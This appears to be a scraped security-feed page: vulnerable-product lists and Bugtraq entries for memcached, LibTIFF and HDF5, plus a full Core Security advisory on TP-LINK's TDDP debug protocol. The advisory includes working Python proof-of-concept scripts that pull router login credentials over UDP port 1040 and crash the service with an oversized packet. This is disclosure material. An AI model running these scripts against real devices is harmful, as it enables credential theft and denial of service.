Overflow

Vulnerable: Oracle VM VirtualBox 5.0.26
Oracle VM VirtualBox 5.0.22
Oracle VM VirtualBox 5.0.16
Oracle VM VirtualBox 5.0.14
Oracle VM VirtualBox 5.0.13
Oracle VM VirtualBox 5.0.12
Oracle VM VirtualBox 5.0.11
Oracle VM VirtualBox 5.0.10
Oracle VM VirtualBox 5.0.9
Oracle VM VirtualBox 5.0.8
Oracle VM VirtualBox 5.0.18
Oracle VM VirtualBox 5.0
Oracle Solaris 11.3
Oracle Solaris 10
Oracle Mysql 5.7.15
Oracle Mysql 5.7.14
Oracle Mysql 5.7.13
Oracle Mysql 5.7.12
Oracle Mysql 5.7.9
Oracle Mysql 5.7.8
Oracle Mysql 5.7.7
Oracle Mysql 5.7.6
Oracle Mysql 5.7.5
Oracle Mysql 5.7.4
Oracle Mysql 5.7.3
Oracle Mysql 5.7.2
Oracle Mysql 5.6.33
Oracle Mysql 5.6.32
Oracle Mysql 5.6.31
Oracle Mysql 5.6.30
Oracle Mysql 5.6.28
Oracle Mysql 5.6.27
Oracle Mysql 5.6.26
Oracle Mysql 5.6.25
Oracle Mysql 5.6.24
Oracle Mysql 5.6.23
Oracle Mysql 5.6.22
Oracle Mysql 5.6.21
Oracle Mysql 5.6.17
Oracle Mysql 5.6.12
Oracle Mysql 5.6.11
Oracle Mysql 5.6.10
Oracle Mysql 5.6.9
Oracle Mysql 5.6.6
Oracle Mysql 5.6
Oracle Mysql 5.7.11
Oracle Mysql 5.7.10
Oracle Mysql 5.6.8
Oracle Mysql 5.6.7
Oracle Mysql 5.6.5
Oracle Mysql 5.6.4
Oracle Mysql 5.6.29
Oracle Mysql 5.6.20
Oracle Mysql 5.6.2
Oracle Mysql 5.6.19
Oracle Mysql 5.6.18
Oracle Mysql 5.6.16
Oracle Mysql 5.6.15
Oracle Mysql 5.6.14
Oracle Mysql 5.6.13
Oracle Enterprise Linux 5
OpenSSL Project OpenSSL 1.0.2
OpenSSL Project OpenSSL 1.0.2h
OpenSSL Project OpenSSL 1.0.2g
OpenSSL Project OpenSSL 1.0.2f
OpenSSL Project OpenSSL 1.0.2e
OpenSSL Project OpenSSL 1.0.2d
OpenSSL Project OpenSSL 1.0.2c
OpenSSL Project OpenSSL 1.0.2b
OpenSSL Project OpenSSL 1.0.2a
OpenSSL Project OpenSSL 1.0.1s
OpenSSL Project OpenSSL 1.0.1r
OpenSSL Project OpenSSL 1.0.1q
OpenSSL Project OpenSSL 1.0.1p
OpenSSL Project OpenSSL 1.0.1o
OpenSSL Project OpenSSL 1.0.1n
OpenSSL Project OpenSSL 1.0.1m
OpenSSL Project OpenSSL 1.0.1l
OpenSSL Project OpenSSL 1.0.1k
OpenSSL Project OpenSSL 1.0.1j
OpenSSL Project OpenSSL 1.0.1i
OpenSSL Project OpenSSL 1.0.1h
OpenSSL Project OpenSSL 1.0.1g
OpenSSL Project OpenSSL 1.0.1f
OpenSSL Project OpenSSL 1.0.1e
OpenSSL Project OpenSSL 1.0.1d
OpenSSL Project OpenSSL 1.0.1c
OpenSSL Project OpenSSL 1.0.1b
OpenSSL Project OpenSSL 1.0.1a
OpenSSL Project OpenSSL 1.0.1
McAfee ePolicy Orchestrator 5.1.2
McAfee ePolicy Orchestrator 5.1.1
McAfee ePolicy Orchestrator 5.1
McAfee ePolicy Orchestrator 5.3.2
McAfee ePolicy Orchestrator 5.3.1
McAfee ePolicy Orchestrator 5.3.0
McAfee ePolicy Orchestrator 5.1.3
IBM Vios 2.2
IBM Tivoli Provisioning Manager for OS Deployment 5.1.1 build 51.05
IBM Tivoli Provisioning Manager for OS Deployment 5.1 3 Intirim Fix 3
IBM Tivoli Provisioning Manager for OS Deployment 5.1 .3
IBM Tivoli Provisioning Manager for OS Deployment 5.1 .116
IBM Tivoli Provisioning Manager for OS Deployment 5.1
IBM Tivoli Provisioning Manager for OS Deployment 7.1.1.20 build 280.6
IBM Tivoli Provisioning Manager for OS Deployment 7.1.1.19
IBM Tivoli Provisioning Manager for OS Deployment 7.1.1
IBM Tivoli Provisioning Manager for OS Deployment 5.1.Fix Pack 3
IBM Tivoli Provisioning Manager for OS Deployment 5.1.1 build 051.07
IBM Tivoli Provisioning Manager for OS Deployment 5.1.0.2
IBM Tivoli Provisioning Manager for Images System x Edition 7.1.1.0
IBM Tivoli Provisioning Manager for Images 7.1.1.20 build 280.6
IBM Tivoli Provisioning Manager for Images 7.1.1.19
IBM Tivoli Provisioning Manager for Images 7.1.1.0
IBM Sterling Connect:Express for UNIX 1.5.0.9
IBM Sterling Connect:Express for UNIX 1.5.0.13
IBM Sterling Connect:Express for UNIX 1.5.0.12
IBM Sterling Connect:Express for UNIX 1.5.0.11
IBM Sterling Connect:Express for UNIX 1.5.0
IBM Sterling Connect:Express for UNIX 1.4.6
IBM Sterling Connect:Express for UNIX 1.4
IBM Integrated Management Module (IMM) for System x YUOO
IBM Integrated Management Module (IMM) for BladeCenter YUOO
IBM i 7.3
IBM i 7.2
IBM i 7.1
IBM BigFix Remote Control 9.1.2
IBM Aix 7.2
IBM AIX 7.1
IBM AIX 6.1
IBM AIX 5.3
Cisco Wide Area Application Services (WAAS) 0
Cisco WebEx Node for MCS 0
Cisco WebEx Meetings Server - SSL Gateway 0
Cisco WebEx Meetings Server - Multimedia Platform (MMP) 0
Cisco WebEx Meetings Server 2.0
Cisco WebEx Meetings Server 1.0
Cisco WebEx Meetings for Windows Phone 8 0
Cisco WebEx Meetings for BlackBerry 0
Cisco WebEx Meetings for Android 0
Cisco WebEx Meetings Client - On-Premises 0
Cisco WebEx Meetings Client - Hosted 0
Cisco WebEx Meeting Center 0
Cisco WebEx Business Suite 0
Cisco Web Security Appliance (WSA) 0
Cisco Visual Quality Experience Tools Server 0
Cisco Visual Quality Experience Server 0
Cisco Virtualization Experience Media Edition 0
Cisco Virtual Security Gateway for Microsoft Hyper-V 0
Cisco Virtual Security Gateway 0
Cisco Videoscape Control Suite 0
Cisco Videoscape AnyRes Live 0
Cisco Video Surveillance PTZ IP Cameras 0
Cisco Video Surveillance Media Server 0
Cisco Video Surveillance 7000 Series IP Cameras 0
Cisco Video Surveillance 6000 Series IP Cameras 0
Cisco Video Surveillance 4300E and 4500E High-Definition IP Cameras 0
Cisco Video Surveillance 4000 Series High-Definition IP Cameras 0
Cisco Video Surveillance 3000 Series IP Cameras 0
Cisco Video Distribution Suite for Internet Streaming (VDS-IS/CDS-IS) 0
Cisco Universal Small Cell Iuh 0
Cisco Universal Small Cell CloudBase Factory Recovery Root Filesystem 2.99.4
Cisco Universal Small Cell CloudBase Factory Recovery Root Filesystem 0
Cisco Universal Small Cell 7000 Series 3.4.2.0
Cisco Universal Small Cell 5000 Series 3.4.2.0
Cisco Universal Small Cell 5000 Series 0
Cisco Unity Express 0
Cisco Unity Connection 0
Cisco Unified Workforce Optimization - Quality Management Solution 0
Cisco Unified Workforce Optimization 0
Cisco Unified Wireless IP Phone 0
Cisco Unified SIP Proxy Software 0
Cisco Unified SIP Proxy 0
Cisco Unified MeetingPlace 0
Cisco Unified IP 9971 Phone 0
Cisco Unified IP 9951 Phone 0
Cisco Unified IP 8961 Phone 0
Cisco Unified IP 8945 Phone 0
Cisco Unified IP 8831 Conference Phone for Third-Party Call Control 0
Cisco Unified IP 8831 Conference Phone 0
Cisco Unified IP 7900 Series Phones 0
Cisco Unified IP 6945 Phone 0
Cisco Unified IP 6901 Phone 0
Cisco Unified Intelligent Contact Management Enterprise 0
Cisco Unified Intelligence Center 0
Cisco Unified Contact Center Express 0
Cisco Unified Contact Center Enterprise - Live Data server 0
Cisco Unified Contact Center Enterprise 0
Cisco Unified Communications Manager Session Management Edition 0
Cisco Unified Communications Manager IM & Presence Service (formerly C 0
Cisco Unified Communications Manager (CUCM) 0
Cisco Unified Communications Domain Manager 0
Cisco Unified Attendant Console Standard 0
Cisco Unified Attendant Console Premium Edition 0
Cisco Unified Attendant Console Enterprise Edition 0
Cisco Unified Attendant Console Department Edition 0
Cisco Unified Attendant Console Business Edition 0
Cisco Unified Attendant Console Advanced 0
Cisco Unified Attendant Console 0
Cisco UCS Standalone C-Series Rack Server - Integrated Management Cont 0
Cisco UCS Manager 0
Cisco UCS Director 0
Cisco UCS Central Software 0
Cisco UCS B-Series Blade Servers 0
Cisco UCS 6200 Series and 6300 Series Fabric Interconnects 0
Cisco UC Integration for Microsoft Lync 0
Cisco TelePresence Video Communication Server (VCS) 0
Cisco TelePresence TX9000 Series 0
Cisco TelePresence System TX1310 0
Cisco TelePresence System EX Series 0
Cisco TelePresence System 500-37 0
Cisco TelePresence System 500-32 0
Cisco TelePresence System 3000 Series 0
Cisco Telepresence System 3000 0
Cisco TelePresence System 1300 0
Cisco TelePresence System 1100 0
Cisco TelePresence System 1000 0
Cisco TelePresence System TX9000
Cisco TelePresence System 500-37
Cisco TelePresence System 500-32
Cisco TelePresence System 1100
Cisco TelePresence System 1000
Cisco TelePresence SX Series 0
Cisco TelePresence Supervisor MSE 8050 0
Cisco TelePresence Server on Virtual Machine 0
Cisco TelePresence Server on Multiparty Media 820 0
Cisco TelePresence Server on Multiparty Media 310 and 320 0
Cisco TelePresence Server 7010 and MSE 8710 0
Cisco TelePresence Serial Gateway Series 0
Cisco TelePresence Profile Series 0
Cisco TelePresence MX Series 0
Cisco TelePresence MCU 0
Cisco TelePresence ISDN Link 0
Cisco TelePresence ISDN Gateway MSE 8321 0
Cisco TelePresence ISDN Gateway 3241 0
Cisco TelePresence Integrator C Series 0
Cisco TelePresence Content Server 0
Cisco TelePresence Conductor 0
Cisco TAPI Service Provider (TSP) 0
Cisco Tandberg Codian MSE 8320 0
Cisco Tandberg Codian ISDN Gateway 0
Cisco StealthWatch UDP Director (formerly Flow Replicator) 0
Cisco StealthWatch UDP Director 0
Cisco StealthWatch Management Console (SMC) 0
Cisco StealthWatch IDentity 0
Cisco StealthWatch FlowCollector sFlow 0
Cisco StealthWatch FlowCollector NetFlow 0
Cisco SPA525G 5-Line IP Phone 0
Cisco SPA51x IP Phones 0
Cisco SPA232D Multi-Line DECT Analog Telephone Adapter (ATA) 0
Cisco SPA122 Analog Telephone Adapter (ATA) with Router 0
Cisco SPA112 2-Port Phone Adapter 0
Cisco SocialMiner 0
Cisco Smart Net Total Care - Local Collector appliance 0
Cisco Smart Care 0
Cisco Small Business SPA500 Series IP Phones 0
Cisco Small Business SPA300 Series IP Phones 0
Cisco Small Business 300 Series (Sx300) Managed Switches 0
Cisco Small Business 300 Series 0
Cisco Show and Share 0
Cisco Services Provisioning Platform 0
Cisco Security Manager 0
Cisco Secure Access Control System (ACS) 0
Cisco Registered Envelope Service 0
Cisco Proactive Network Operations Center 0
Cisco Prime Performance Manager 0
Cisco Prime Optical for Service Providers 0
Cisco Prime Optical 0
Cisco Prime Network Services Controller 0
Cisco Prime Network 0
Cisco Prime License Manager 0
Cisco Prime LAN Management Solution 0
Cisco Prime IP Express 0
Cisco Prime Infrastructure Plug and Play Standalone Gateway 0
Cisco Prime Data Center Network Manager -
Cisco Prime Collaboration Provisioning 0
Cisco Prime Collaboration Deployment 0
Cisco Prime Collaboration Assurance 0
Cisco Prime Access Registrar 0
Cisco Physical Access Gateways 0
Cisco Partner Support Service 1.0
Cisco Paging Server (Informacast) 0
Cisco Paging Server 0
Cisco Packaged Contact Center Enterprise 0
Cisco ONS 15454 Series Multiservice Provisioning Platforms 0
Cisco OnePK All-in-One VM 0
Cisco onePK All-in-One Virtual Machine 0
Cisco One Portal 0
Cisco Nexus 9000 Series Switches - Standalone NX-OS mode 0
Cisco Nexus 9000 Series Fabric Switches - ACI mode 0
Cisco Nexus 7000 Series Switches 0
Cisco Nexus 6000 Series Switches 0
Cisco Nexus 5000 Series Switches 0
Cisco Nexus 4000 Series Blade Switches 0
Cisco Nexus 3000 Series Switches 0
Cisco Nexus 1000V Series Switches 0
Cisco Nexus 1000V InterCloud for VMware 0
Cisco Nexus 1000V InterCloud 0
Cisco Network Performance Analysis 0
Cisco Network Analysis Module 0
Cisco NetFlow Generation Appliance 0
Cisco NAC Guest Server 0
Cisco NAC Appliance - Clean Access Server 0
Cisco NAC Appliance - Clean Access Manager 0
Cisco MXE 3500 Series Media Experience Engines 0
Cisco Multicast Manager 0
Cisco Mobility Services Engine 0
Cisco MediaSense 0
Cisco Media Services Interface 0
Cisco MDS 9000 Series Multilayer Switches 0
Cisco Management Appliance 0
Cisco Lancope Stealthwatch FlowCollector sFlow 0
Cisco Lancope Stealthwatch FlowCollector NetFlow 0
Cisco Jabber Software Development Kit 0
Cisco Jabber Guest 0
Cisco Jabber for Windows 0
Cisco Jabber for Mac 0
Cisco Jabber for iPhone and iPad 0
Cisco Jabber for Android 0
Cisco Jabber Client Framework (JCF) Components 0
Cisco Jabber 0
Cisco IronPort Email Security Appliance 0
Cisco IP Interoperability and Collaboration System (IPICS) 0
Cisco IP 8800 Series Phones - VPN feature 0
Cisco IP 7800 Series Phones 0
Cisco IOS XR Software 0
Cisco Intrusion Prevention System (IPS) Solutions 0
Cisco InTracer 0
Cisco Intelligent Automation for Cloud 0
Cisco Identity Services Engine 0
Cisco Hosted Collaboration Mediation Fulfillment 0
Cisco FireSIGHT System Software 0
Cisco Expressway series 0
Cisco Enterprise Content Delivery System (ECDS) 0
Cisco Emergency Responder 0
Cisco Emergency Responder
Cisco Email Security Appliance (ESA) 0
Cisco Email Security Appliance 0
Cisco Edge 340 Digital Media Player 0
Cisco Edge 300 Digital Media Player 0
Cisco DX Series IP Phones 0
Cisco Content Security Management Appliance (SMA) 0
Cisco Content Security Management Appliance 0
Cisco Content Security Appliance Update Servers 0
Cisco Connected Grid Routers 0
Cisco Connected Analytics For Collaboration 0
Cisco Configuration Professional 0
Cisco Computer Telephony Integration Object Server (CTIOS) 0
Cisco Common Services Platform Collector 0
Cisco Cloupia Unified Infrastructure Controller 0
Cisco Cloud Web Security (CWS) 0
Cisco Cloud Web Security 0
Cisco Cloud Object Storage 0
Cisco Clean Access Manager 0
Cisco Broadband Access Center Telco and Wireless 0
Cisco ATA 190 Series Analog Terminal Adaptors 0
Cisco ATA 187 Analog Telephone Adaptor 0
Cisco ASR 5000 Series 0
Cisco ASA Next-Generation Firewall Services 0
Cisco Application Policy Infrastructure Controller (APIC) 0
Cisco Application Networking Manager (ANM) 0
Cisco Application and Content Networking System (ACNS) 0
Cisco AnyConnect Secure Mobility Client for Windows 0
Cisco AnyConnect Secure Mobility Client for Mac OS X 0
Cisco AnyConnect Secure Mobility Client for Linux 0
Cisco AnyConnect Secure Mobility Client for iOS 0
Cisco AnyConnect Secure Mobility Client for desktop platforms 0
Cisco AnyConnect Secure Mobility Client for Android 0
Cisco AnyConnect Secure Mobility Client 0
Cisco Aironet 2700 Series Access Points 0
Cisco Agent for OpenFlow 0
Cisco Agent Desktop for Cisco Unified Contact Center Express 0
Cisco Agent Desktop
Cisco Adaptive Security Appliance (ASA) 0
Cisco ACE30 Application Control Engine Module 0
Cisco ACE 4710 Application Control Engine 0
Cisco 910 Industrial Router 0
Cisco 500 Series Stackable (Sx500) Managed Switches 0
Cisco 500 Series Stackable 0
Cisco 4400 Series Digital Media Players 0
Cisco 4300 Series Digital Media Players 0
Cisco 220 Series Smart Plus (Sx220) Switches 0
CentOS CentOS 7


SecurityFocus Vulnerabilities

  • info
  • discussion
  • exploit
  • solution
  • references
Memcached Multiple Integer Overflow Vulnerabilities

Bugtraq ID: 94083
Class: Boundary Condition Error
CVE: CVE-2016-8704
CVE-2016-8705
CVE-2016-8706
Remote: Yes
Local: No
Published: Oct 31 2016 12:00AM
Updated: Nov 23 2016 04:08AM
Credit: Aleksandar Nikolic of Cisco Talos
Vulnerable: Memcached memcached 1.4.31
Not Vulnerable:


SecurityFocus Vulnerabilities

1. Advisory Information

Title: TP-LINK TDDP Multiple Vulnerabilities
Advisory ID: CORE-2016-0007
Advisory URL: http://www.coresecurity.com/advisories/tp-link-tddp-multiple-vulnerabilities
Date published: 2016-11-21
Date of last update: 2016-11-18
Vendors contacted: TP-Link
Release mode: User release

2. Vulnerability Information

Class: Missing Authentication for Critical Function [CWE-306], Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') [CWE-120]
Impact: Code execution, Information leak
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-pending-assignment-1, CVE-pending-assignment-2

3. Vulnerability Description

TP-LINK [1] ships some of their devices with a debugging protocol activated by default. This debugging protocol is listening on the 1040 UDP port on the LAN interface.

Vulnerabilities were found in the implementation of this protocol, that could lead to remote code execution and information leak (credentials acquisition).

4. Vulnerable Devices

TP-LINK WA5210g. (Firmware v1 and v2 are vulnerable)
Other devices might be affected, but they were not tested.

5. Vendor Information, Solutions and Workarounds

No workarounds are available for this device.

6. Credits

This vulnerability was discovered and researched by Andres Lopez Luksenberg from Core Security Exploit Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.

7. Technical Description / Proof of Concept Code

TP-LINK distributes some of their hardware with a debugging service activate by default. This program uses a custom protocol. Vulnerabilities were found using this protocol, that could lead to remote code execution or information leak.

7.1. Missing Authentication for TDDP v1

[CVE-pending-assignment-1] If version 1 is selected when communicating with the TDDP service, there is a lack of authentication in place. Additionally if the message handler accepts the "Get configuration" message type, this will result in the program leaking the web interface configuration file, which includes the web login credentials.

The following is a proof of concept to demonstrate the vulnerability (Impacket [2] is required for the PoC to work):

import socket
import re
from impacket.winregistry import hexdump
from impacket.structure import Structure
import struct

class TDDP(Structure):
structure = (
('version','B=0x1'),
('type','B=0'),
('code','B=0'),
('replyInfo','B=0'),
('packetLength','>L=0'),
('pktID','<H=1'),
('subType','B=0'),
('reserved','B=0'),
('payload',':=""'),
)
def printPayload(self):
print self.getPayloadAsString()

def getPayloadAsString(self):
s=''
for i in range(len(self['payload'])):
s += "%.2X" % struct.unpack("B", self['payload'][i])[0]
return s

class TDDPRequestsPacketBuilder(object):
SET_CONFIG = 1
GET_CONFIG = 2
CMD_SYS0_PR = 3
GET_SERIAL_NUMBER = 5

GET_PRODUCT_ID = 10

def getRequestPacket(self):
tddp = TDDP()
tddp['version'] = 1
tddp['replyInfo'] = 1
return tddp

def getConfigPacket(self):
tddp = self.getRequestPacket()
tddp['type'] = self.GET_CONFIG
tddp['payload'] = ('\x00'*0x10) + 'all'
tddp['packetLength'] = len(tddp['payload'])
return tddp

def setConfigPacket(self, trail):
tddp = self.getRequestPacket()
tddp['type'] = self.SET_CONFIG
tddp['payload'] = ('\x00'*0x10) + trail
tddp['packetLength'] = len(tddp['payload'])
return tddp

def getSerialNumberPacket(self):
tddp = self.getRequestPacket()
tddp['type'] = self.GET_SERIAL_NUMBER
return tddp

def getProductIDPacket(self):
tddp = self.getRequestPacket()
tddp['type'] = self.GET_PRODUCT_ID
return tddp

def CMD_SYS0_PR_Packet(self, trail):
tddp = self.getRequestPacket()
tddp['type'] = self.CMD_SYS0_PR
tddp['replyInfo'] = 2
tddp['payload'] = ('\x00'*0x10)
tddp['packetLength'] = len(tddp['payload'])
tddp['payload'] += trail
return tddp

class TPLINKConfig(object):
def __init__(self, aConfig):
self.__parseConfig(aConfig)

def __sanitizeKeyValue(self, k, v):
k = k.replace("\r", "")
k = k.replace("\n", "")

v = v.replace("\r", "")
v = v.replace("\n", "")

return k,v

def __parseConfig(self, aConfig):
self.__key_order = []
self.Header = aConfig[:0x10]
pending = aConfig[0x10:]
k_v = re.findall("(.*?) (.*)", pending)

for k, v in k_v:
k,v = self.__sanitizeKeyValue(k,v)
real_value = v.split(" ")
if len(real_value) == 1:
real_value = real_value[0]

self.__dict__[k] = real_value
self.__key_order.append(k)

def __str__(self):
cfg = []
cfg.append(self.Header)

for k in self.__key_order:
value = self.__dict__[k]

if not isinstance(value, basestring):
str_value = " ".join(value)
else:
str_value = value

line = "%s %s" % (k, str_value)

cfg.append(line)

str_cfg = "\r\n".join(cfg)

return str_cfg

class TDDPSessionV1(object):
def __init__(self, ip, port=1040):
self.ip = ip
self.port = port
self.req_buidler = TDDPRequestsPacketBuilder()

def send(self, aPacket):
self.conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.conn.sendto(str(aPacket), (self.ip, self.port))
self.conn.close()

def recv(self, n):
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.bind(('', 61000))
data, addr = udp.recvfrom(n)
return TDDP(data)

def _send_and_recv(self, packet, n):
self.send(packet)
return self.recv(n)

#####################################
def getConfig(self):
c_packet = self.req_buidler.getConfigPacket()
return TPLINKConfig(self._send_and_recv(c_packet, 50000)['payload'])

def getSerialNumber(self):
c_packet = self.req_buidler.getSerialNumberPacket()
return self._send_and_recv(c_packet, 50000).getPayloadAsString()

def getProductID(self):
c_packet = self.req_buidler.getProductIDPacket()
return self._send_and_recv(c_packet, 50000).getPayloadAsString()

def setInitState(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("init")
return self._send_and_recv(c_packet, 50000)

def save(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("save")
self._send_and_recv(c_packet, 50000)

def reboot(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("reboot")
self._send_and_recv(c_packet, 50000)

def clr_dos(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("clr_dos")
self._send_and_recv(c_packet, 50000)

def setConfig(self, aConfig):
c_packet = self.req_buidler.setConfigPacket(str(aConfig))
self._send_and_recv(c_packet, 50000)

HOST = "192.168.1.254"

s = TDDPSessionV1(HOST)
config = s.getConfig()
print "user: ", config.lgn_usr
print "pass: ", config.lgn_pwd

7.2. Buffer Overflow in TDDP v1 protocol

[CVE-pending-assignment-2] A buffer overflow vulnerability was found when sending a handcrafted "set configuration" message to the TDDP service with an extensive configuration file and forcing version 1 in the packet.

The following is a proof of concept to demonstrate the vulnerability by crashing the TDDP service (Impacket [2] is required for the PoC to work). To reestablish the TDDP service the device must be restarted:

import socket
import re
import string
from impacket.winregistry import hexdump
from impacket.structure import Structure
import struct

class TDDP(Structure):
structure = (
('version','B=0x1'),
('type','B=0'),
('code','B=0'),
('replyInfo','B=0'),
('packetLength','>L=0'),
('pktID','<H=1'),
('subType','B=0'),
('reserved','B=0'),
('payload',':=""'),
)
def printPayload(self):
print self.getPayloadAsString()

def getPayloadAsString(self):
s=''
for i in range(len(self['payload'])):
s += "%.2X" % struct.unpack("B", self['payload'][i])[0]
return s

class TDDPRequestsPacketBuilder(object):
SET_CONFIG = 1
GET_CONFIG = 2
CMD_SYS0_PR = 3
GET_SERIAL_NUMBER = 5

GET_PRODUCT_ID = 10

def getRequestPacket(self):
tddp = TDDP()
tddp['version'] = 1
tddp['replyInfo'] = 1
return tddp

def getConfigPacket(self):
tddp = self.getRequestPacket()
tddp['type'] = self.GET_CONFIG
tddp['payload'] = ('\x00'*0x10) + 'all'
tddp['packetLength'] = len(tddp['payload'])
return tddp

def setConfigPacket(self, trail):
tddp = self.getRequestPacket()
tddp['type'] = self.SET_CONFIG
tddp['payload'] = ('\x00'*0x10) + trail
tddp['packetLength'] = len(tddp['payload'])
return tddp

def getSerialNumberPacket(self):
tddp = self.getRequestPacket()
tddp['type'] = self.GET_SERIAL_NUMBER
return tddp

def getProductIDPacket(self):
tddp = self.getRequestPacket()
tddp['type'] = self.GET_PRODUCT_ID
return tddp

def CMD_SYS0_PR_Packet(self, trail):
tddp = self.getRequestPacket()
tddp['type'] = self.CMD_SYS0_PR
tddp['replyInfo'] = 2
tddp['payload'] = ('\x00'*0x10)
tddp['packetLength'] = len(tddp['payload'])
tddp['payload'] += trail
return tddp

class TPLINKConfig(object):
def __init__(self, aConfig):
self.__parseConfig(aConfig)

def __sanitizeKeyValue(self, k, v):
k = k.replace("\r", "")
k = k.replace("\n", "")

v = v.replace("\r", "")
v = v.replace("\n", "")

return k,v

def __parseConfig(self, aConfig):
self.__key_order = []
self.Header = aConfig[:0x10]
pending = aConfig[0x10:]
k_v = re.findall("(.*?) (.*)", pending)

for k, v in k_v:
k,v = self.__sanitizeKeyValue(k,v)
real_value = v.split(" ")
if len(real_value) == 1:
real_value = real_value[0]

self.__dict__[k] = real_value
self.__key_order.append(k)

def __str__(self):
cfg = []
cfg.append(self.Header)

for k in self.__key_order:
value = self.__dict__[k]

if not isinstance(value, basestring):
str_value = " ".join(value)
else:
str_value = value

line = "%s %s" % (k, str_value)

cfg.append(line)

str_cfg = "\r\n".join(cfg)

return str_cfg

class TDDPSessionV1(object):
def __init__(self, ip, port=1040):
self.ip = ip
self.port = port
self.req_buidler = TDDPRequestsPacketBuilder()

def send(self, aPacket):
self.conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.conn.sendto(str(aPacket), (self.ip, self.port))
self.conn.close()

def recv(self, n):
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.bind(('', 61000))
data, addr = udp.recvfrom(n)
return TDDP(data)

def _send_and_recv(self, packet, n):
self.send(packet)
return self.recv(n)

#####################################
def getConfig(self):
c_packet = self.req_buidler.getConfigPacket()
return TPLINKConfig(self._send_and_recv(c_packet, 50000)['payload'])

def getSerialNumber(self):
c_packet = self.req_buidler.getSerialNumberPacket()
return self._send_and_recv(c_packet, 50000).getPayloadAsString()

def getProductID(self):
c_packet = self.req_buidler.getProductIDPacket()
return self._send_and_recv(c_packet, 50000).getPayloadAsString()

def setInitState(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("init")
return self._send_and_recv(c_packet, 50000)

def save(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("save")
self._send_and_recv(c_packet, 50000)

def reboot(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("reboot")
self._send_and_recv(c_packet, 50000)

def clr_dos(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("clr_dos")
self._send_and_recv(c_packet, 50000)

def setConfig(self, aConfig):
c_packet = self.req_buidler.setConfigPacket(str(aConfig))
self._send_and_recv(c_packet, 50000)

class Exploit(TDDPSessionV1):
def run(self):
c_packet = self.req_buidler.getRequestPacket()
c_packet['type'] = self.req_buidler.SET_CONFIG
c_packet['payload'] = "A"*325
c_packet['packetLength'] = 0x0264
return self.send(c_packet)

HOST = "192.168.1.254"
PORT = 1040
s = Exploit(HOST)
s.run()

8. Report Timeline

2016-10-04: Core Security sent an initial notification to TP-Link.
2016-10-07: Core Security sent a second notification to TP-Link.
2016-10-31: Core Security sent a third notification to TP-Link through Twitter.
2016-11-09: Core Security sent a fourth notification to TP-Link through email and Twitter without receiving any response whatsoever.
2016-11-10: Core Security sent a request to Mitre for two CVE ID's for this advisory.
2016-11-12: Mitre replied that the vulnerabilities didn't affected products that were in the scope for CVE.
2016-11-21: Advisory CORE-2016-0007 published.
9. References

[1] http://www.tplink.com/.
[2] https://www.coresecurity.com/corelabs-research/open-source-tools/impacket.

10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. About Core Security

Courion and Core Security have rebranded the combined company, changing its name to Core Security, to reflect the company's strong commitment to providing enterprises with market-leading, threat-aware, identity, access and vulnerability management solutions that enable actionable intelligence and context needed to manage security risks across the enterprise. Core Security's analytics-driven approach to security enables customers to manage access and identify vulnerabilities, in order to minimize risks and maintain continuous compliance. Solutions include Multi-Factor Authentication, Provisioning, Identity Governance and Administration (IGA), Identity and Access Intelligence (IAI), and Vulnerability Management (VM). The combination of these solutions provides context and shared intelligence through analytics, giving customers a more comprehensive view of their security posture so they can make more informed, prioritized, and better security remediation decisions.

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected]

12. Disclaimer

The contents of this advisory are copyright (c) 2016 Core Security and (c) 2016 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


Exploit Files ≈ Packet Storm

  • info
  • discussion
  • exploit
  • solution
  • references
LibTIFF CVE-2016-5652 Heap Buffer Overflow Vulnerability

Bugtraq ID: 93902
Class: Boundary Condition Error
CVE: CVE-2016-5652
Remote: Yes
Local: No
Published: Oct 25 2016 12:00AM
Updated: Nov 20 2016 01:03AM
Credit: Tyler Bohan of Cisco Talos.
Vulnerable: LibTIFF LibTIFF 4.0.6
Not Vulnerable:


SecurityFocus Vulnerabilities

  • info
  • discussion
  • exploit
  • solution
  • references
HDF5 CVE-2016-4332 Local Heap Overflow Vulnerability

Bugtraq ID: 94417
Class: Boundary Condition Error
CVE: CVE-2016-4332
Remote: No
Local: Yes
Published: Nov 17 2016 12:00AM
Updated: Nov 20 2016 12:12AM
Credit: Cisco Talos.
Vulnerable: HDF5 HDF5 1.8.16
Not Vulnerable:


SecurityFocus Vulnerabilities

  • info
  • discussion
  • exploit
  • solution
  • references
HDF5 CVE-2016-4333 Local Heap Buffer Overflow Vulnerability

Bugtraq ID: 94416
Class: Unknown
CVE: CVE-2016-4333
Remote: No
Local: Yes
Published: Nov 17 2016 12:00AM
Updated: Nov 20 2016 12:12AM
Credit: Cisco Talos.
Vulnerable: HDF5 HDF5 1.8.16
Not Vulnerable:


SecurityFocus Vulnerabilities

Vulnerable: Oracle VM VirtualBox 5.0.26
Oracle VM VirtualBox 5.0.22
Oracle VM VirtualBox 5.0.16
Oracle VM VirtualBox 5.0.14
Oracle VM VirtualBox 5.0.13
Oracle VM VirtualBox 5.0.12
Oracle VM VirtualBox 5.0.11
Oracle VM VirtualBox 5.0.10
Oracle VM VirtualBox 5.0.9
